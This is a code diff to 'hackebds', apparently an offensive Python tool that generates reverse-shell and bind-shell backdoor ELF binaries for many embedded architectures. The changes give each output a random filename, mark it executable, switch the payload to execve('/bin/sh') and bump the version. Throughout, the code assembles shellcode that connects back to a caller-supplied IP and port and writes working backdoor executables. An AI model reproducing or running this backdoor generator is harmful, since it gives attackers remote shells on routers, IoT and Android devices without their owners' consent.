@@ -8,7 +8,13 @@ from hackebds.ESH import *
 from hackebds.powerpc_info import *
 from colorama import Fore,Back,Style
 from . import sparc32
+from . import sparc64
+from . import backdoor_encode
+from . import hackebds_cmd
+import string
+from . import my_package
 
+chars = string.ascii_letters
 
 def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 	context.arch='mips'
@@ -40,14 +46,16 @@ def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 	if filename==None:
 		log.info("waiting 3s")
 		sleep(1)
-		filename="mipsel_backdoor"
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
 		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("mipsel_backdoor is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
+		return 
 	else:
 		if(os.path.exists(filename) != True):
 			log.info("waiting 3s")
@@ -55,10 +63,12 @@ def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
 			context.endian="little"
+			return 
 		else:
 			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
 			choise = input()
@@ -68,10 +78,12 @@ def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
 				context.endian="little"
+				return 
 			else:
 				return 
 
@@ -97,20 +109,23 @@ def aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 	svc #1337
 	'''
 	shellcode2=asm(shellcode2)
-	shellcode3=asm(shellcraft.sh())
+	shellcode3=asm(shellcraft.execve("/bin/sh",["/bin/sh"]),0)
 	all_reverseshell=basic_shellcode+shellcode2+shellcode3
 	ELF_data=make_elf(all_reverseshell)
 	if filename==None:
 		filename="backdoor_aarch64"
 		log.info("waiting 3s")
 		sleep(1)
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
 		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("backdoor_aarch64 is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
+		return all_reverseshell
 	else:
 		if(os.path.exists(filename) != True):
 			log.info("waiting 3s")
@@ -118,10 +133,12 @@ def aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
 			context.endian="little"
+			return all_reverseshell
 		else:
 			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
 			choise = input()
@@ -132,11 +149,13 @@ def aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 				f.write(ELF_data)
 				f.close()
 				log.success("{} generated successfully".format(filename))
+				os.chmod(filename, 0o755)
 				context.arch='i386'
 				context.bits="32"
 				context.endian="little"
+				return all_reverseshell
 			else:
-				return  
+				return all_reverseshell
 
 def aarch64_reverse_sl(reverse_ip,reverse_port):
 	context.arch='aarch64'
@@ -251,18 +270,18 @@ def armelv7_backdoor(reverse_ip,reverse_port,filename=None):
 	svc #0
 	'''
 	shellcode2=asm(shellcode2)
-	shellcode3=asm(shellcraft.sh())
+	shellcode3=asm(shellcraft.execve("/bin/sh",["/bin/sh"],0))
 	all_reverseshell=basic_shellcode+shellcode2+shellcode3
 	ELF_data=make_elf(all_reverseshell)
 	if filename==None:
 		log.info("waiting 3s")
 		sleep(1)
-		filename="backdoor_armelv7"
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
 		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		#print disasm(all_reverseshell)
-		log.success("backdoor_armelv7 is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -273,6 +292,7 @@ def armelv7_backdoor(reverse_ip,reverse_port,filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -286,6 +306,7 @@ def armelv7_backdoor(reverse_ip,reverse_port,filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -503,14 +524,14 @@ def armelv5_backdoor(reverse_ip,reverse_port,filename=None):
 	shellcode=asm(shellcode)[:-2]
 	ELF_data = make_elf(shellcode)
 	if filename==None:
-		filename="backdoor_armelv5"
+		log.info("waiting 3s")
+		sleep(1)
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
 		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.info("waiting 3s")
-		sleep(1)
-		#print disasm(all_reverseshell)
-		log.success("backdoor_armelv5 is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -521,6 +542,7 @@ def armelv5_backdoor(reverse_ip,reverse_port,filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -534,6 +556,7 @@ def armelv5_backdoor(reverse_ip,reverse_port,filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -912,12 +935,12 @@ def armebv7_backdoor(reverse_ip,reverse_port,filename=None):
 	if filename==None:
 		log.info("waiting 3s")
 		sleep(1)
-		filename="backdoor_armv7"
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
 		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		#print disasm(all_reverseshell)
-		log.success("backdoor_armebv7 is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -928,6 +951,7 @@ def armebv7_backdoor(reverse_ip,reverse_port,filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -941,6 +965,7 @@ def armebv7_backdoor(reverse_ip,reverse_port,filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -1042,14 +1067,14 @@ def armebv5_backdoor(reverse_ip,reverse_port,filename=None):
 	shellcode=asm(shellcode)[:-2]
 	ELF_data = make_elf(shellcode)
 	if filename==None:
-		filename="backdoor_armebv5"
+		log.info("waiting 3s")
+		sleep(1)
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
 		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.info("waiting 3s")
-		sleep(1)
-		#print disasm(all_reverseshell)
-		log.success("backdoor_armebv5 is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -1060,6 +1085,7 @@ def armebv5_backdoor(reverse_ip,reverse_port,filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -1073,6 +1099,7 @@ def armebv5_backdoor(reverse_ip,reverse_port,filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -1099,23 +1126,27 @@ def mips_backdoor(reverse_ip,reverse_port,filename=None):
 	li  $v0,0xfdf
 	syscall 0x40404
 	'''
+	shellcode_execve = shellcraft.execve("/bin/sh",["/bin/sh"],0)
 	log.success("reverse_ip is: "+ reverse_ip)
 	log.success("reverse_port is: "+str(reverse_port))
+	#all_shellcode = shellcraft.connect(reverse_ip,reverse_port) + shellcode_dump_sh + shellcode_execve
 	shellcode_dump_sh=asm(shellcode_dump_sh)
-	shellcode_execve=asm(shellcraft.execve("/bin/sh",["/bin/sh"],0))
+	shellcode_execve=asm(shellcode_execve)
 	ELF_data_shellcode=shellcode_connect+shellcode_dump_sh+shellcode_execve
 	ELF_data=make_elf(ELF_data_shellcode)
 	if filename==None:
 		log.info("waiting 3s")
 		sleep(1)
-		filename="mips_backdoor"
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
 		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("mips_backdoor is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
+		return 
 	else:
 		if(os.path.exists(filename) != True):
 			log.info("waiting 3s")
@@ -1123,10 +1154,12 @@ def mips_backdoor(reverse_ip,reverse_port,filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
 			context.endian="little"
+			return 
 		else:
 			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
 			choise = input()
@@ -1136,14 +1169,15 @@ def mips_backdoor(reverse_ip,reverse_port,filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
 				context.endian="little"
+				return 
 			else:
 				return 
-
-
+		
 def mipsel_reverse_sl(reverse_ip,reverse_port):
 	context.arch='mips'
 	context.endian='little'
@@ -1346,10 +1380,12 @@ def mips64el_backdoor(reverse_ip,reverse_port,filename=None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./mips64el_backdoor","wb")
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("mips64el_backdoor is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
@@ -1360,6 +1396,7 @@ def mips64el_backdoor(reverse_ip,reverse_port,filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -1373,6 +1410,7 @@ def mips64el_backdoor(reverse_ip,reverse_port,filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -1475,10 +1513,12 @@ def mips64_backdoor(reverse_ip,reverse_port,filename=None):
 	if (filename == None):
 		log.info("waiting 3s")
 		sleep(1)
-		f = open("./mips64_backdoor", "wb")
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("mips64_backdoor is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
@@ -1489,6 +1529,7 @@ def mips64_backdoor(reverse_ip,reverse_port,filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -1502,6 +1543,7 @@ def mips64_backdoor(reverse_ip,reverse_port,filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -1799,10 +1841,12 @@ def riscv64el_backdoor(reverse_ip,reverse_port,filename=None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./riscv64el_backdoor","wb")
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("riscv64el_backdoor is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
@@ -1813,6 +1857,7 @@ def riscv64el_backdoor(reverse_ip,reverse_port,filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -1826,6 +1871,7 @@ def riscv64el_backdoor(reverse_ip,reverse_port,filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -1861,12 +1907,12 @@ def android_aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 	if filename==None:
 		log.info("waiting 3s")
 		sleep(1)
-		filename="backdoor_Android_aarch64"
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
 		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		#print disasm(all_reverseshell)
-		log.success("backdoor_Android_aarch64 is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -1877,6 +1923,7 @@ def android_aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -1890,6 +1937,7 @@ def android_aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -2004,10 +2052,12 @@ def x64_bind_shell(listen_port, passwd, filename=None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./x64_bind_shell","wb")
+		filename=context.arch + "-bind_shell-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("x64_bind_shell is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
@@ -2018,6 +2068,7 @@ def x64_bind_shell(listen_port, passwd, filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -2031,6 +2082,7 @@ def x64_bind_shell(listen_port, passwd, filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -2144,10 +2196,12 @@ def x86_bind_shell(listen_port, passwd, filename=None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./x86_bind_shell","wb")
+		filename=context.arch + "-bind_shell-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("x86_bind_shell is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
@@ -2158,6 +2212,7 @@ def x86_bind_shell(listen_port, passwd, filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -2171,6 +2226,7 @@ def x86_bind_shell(listen_port, passwd, filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -2259,10 +2315,12 @@ def armelv7_bind_shell(listen_port, passwd, filename=None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./armelv7_bind_shell","wb")
+		filename=context.arch + "-bind_shell-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("armelv7_bind_shell is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
@@ -2273,6 +2331,7 @@ def armelv7_bind_shell(listen_port, passwd, filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -2286,6 +2345,7 @@ def armelv7_bind_shell(listen_port, passwd, filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -2372,10 +2432,12 @@ def armv7eb_bind_shell(listen_port, passwd, filename = None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./armebv7_bind_shell","wb")
+		filename=context.arch + "-bind_shell-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("armebv7_bind_shell is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
@@ -2386,6 +2448,7 @@ def armv7eb_bind_shell(listen_port, passwd, filename = None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -2399,6 +2462,7 @@ def armv7eb_bind_shell(listen_port, passwd, filename = None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -2425,10 +2489,12 @@ def x64el_backdoor(reverse_ip, reverse_port, filename=None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./x64el_backdoor","wb")
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("x64el_backdoor is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
@@ -2439,6 +2505,7 @@ def x64el_backdoor(reverse_ip, reverse_port, filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -2452,6 +2519,7 @@ def x64el_backdoor(reverse_ip, reverse_port, filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -2476,10 +2544,12 @@ def x86el_backdoor(reverse_ip, reverse_port, filename =None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./x86el_backdoor","wb")
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("x86el_backdoor is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 	else:
 		if(os.path.exists(filename) != True):
 			log.info("waiting 3s")
@@ -2487,6 +2557,7 @@ def x86el_backdoor(reverse_ip, reverse_port, filename =None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} is ok in current path ./".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -2500,6 +2571,7 @@ def x86el_backdoor(reverse_ip, reverse_port, filename =None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} is ok in current path ./".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -2589,10 +2661,12 @@ def mipsel_bind_shell(listen_port, passwd,filename = None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./mipsel_bind_shell","wb")
+		filename=context.arch + "-bind_shell-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("mipsel_bind_shell is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
@@ -2603,6 +2677,7 @@ def mipsel_bind_shell(listen_port, passwd,filename = None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -2616,6 +2691,7 @@ def mipsel_bind_shell(listen_port, passwd,filename = None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -2703,10 +2779,12 @@ def mips_bind_shell(listen_port, passwd, filename=None ):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./mips_bind_shell","wb")
+		filename=context.arch + "-bind_shell-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("mips_bind_shell is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
@@ -2717,6 +2795,7 @@ def mips_bind_shell(listen_port, passwd, filename=None ):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -2730,6 +2809,7 @@ def mips_bind_shell(listen_port, passwd, filename=None ):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -2831,10 +2911,12 @@ def aarch64_bind_shell(listen_port, passwd, filename = None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./aarch64_bind_shell","wb")
+		filename=context.arch + "-bind_shell-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("aarch64_bind_shell is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
@@ -2845,6 +2927,7 @@ def aarch64_bind_shell(listen_port, passwd, filename = None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -2858,6 +2941,7 @@ def aarch64_bind_shell(listen_port, passwd, filename = None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -2977,10 +3061,12 @@ def mips64el_bind_shell(listen_port, passwd, filename=None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./mips64el_bind_shell","wb")
+		filename=context.arch + "-bind_shell-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("mips64el_bind_shell is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
@@ -2991,6 +3077,7 @@ def mips64el_bind_shell(listen_port, passwd, filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -3004,6 +3091,7 @@ def mips64el_bind_shell(listen_port, passwd, filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -3114,10 +3202,12 @@ def mips64_bind_shell(listen_port, passwd, filename=None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./mips64_bind_shell","wb")
+		filename=context.arch + "-bind_shell-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("mips64_bind_shell is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
@@ -3128,6 +3218,7 @@ def mips64_bind_shell(listen_port, passwd, filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -3141,6 +3232,7 @@ def mips64_bind_shell(listen_port, passwd, filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -3177,23 +3269,40 @@ def x86el_backdoor(reverse_ip, reverse_port, filename=None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./x86el_backdoor","wb")
-		f.write(ELF_data)
-		f.close()
-		log.success("x86el_backdoor is ok in current path ./")
-		context.arch = 'i386'
-		context.bits = "32"
-		context.endian = "little"
-	else:
-		log.info("waiting 3s")
-		sleep(1)
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
 		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
+		os.chmod(filename, 0o755)
 		log.success("{} is ok in current path ./".format(filename))
-		context.arch='i386'
-		context.bits="32"
-		context.endian="little"
+	else:
+		if(os.path.exists(filename) != True):
+			log.info("waiting 3s")
+			sleep(1)
+			f=open(filename,"wb")
+			f.write(ELF_data)
+			f.close()
+			os.chmod(filename, 0o755)
+			log.success("{} is ok in current path ./".format(filename))
+			context.arch='i386'
+			context.bits="32"
+			context.endian="little"
+		else:
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			choise = input()
+			if choise == "y\n" or choise == "\n":
+				log.info("waiting 3s")
+				sleep(1)
+				f=open(filename,"wb")
+				f.write(ELF_data)
+				f.close()
+				os.chmod(filename, 0o755)
+				log.success("{} is ok in current path ./".format(filename))
+				context.arch='i386'
+				context.bits="32"
+				context.endian="little"
+			else:
+				return 
 
 def x64el_backdoor(reverse_ip, reverse_port, filename=None):
 	context.arch = 'amd64'
@@ -3209,10 +3318,12 @@ def x64el_backdoor(reverse_ip, reverse_port, filename=None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./x64el_backdoor","wb")
+		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		log.success("x64el_backdoor is ok in current path ./")
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
@@ -3223,6 +3334,7 @@ def x64el_backdoor(reverse_ip, reverse_port, filename=None):
 			f=open(filename,"wb")
 			f.write(ELF_data)
 			f.close()
+			os.chmod(filename, 0o755)
 			log.success("{} generated successfully".format(filename))
 			context.arch='i386'
 			context.bits="32"
@@ -3236,6 +3348,7 @@ def x64el_backdoor(reverse_ip, reverse_port, filename=None):
 				f=open(filename,"wb")
 				f.write(ELF_data)
 				f.close()
+				os.chmod(filename, 0o755)
 				log.success("{} generated successfully".format(filename))
 				context.arch='i386'
 				context.bits="32"
@@ -3319,7 +3432,7 @@ def test1():
 '''
 
 def get_version():
-    return Fore.GREEN+"Version: 0.2.7"
+    return Fore.GREEN+"Version: 0.2.8"+Fore.RESET
 
 
 reverse_backdoor_dic = {
@@ -3340,7 +3453,9 @@ reverse_backdoor_dic = {
     15: powerpc_info.powerpcle_backdoor,
 	16: powerpc_info.powerpc64_backdoor,
 	17: powerpc_info.powerpc64le_backdoor,
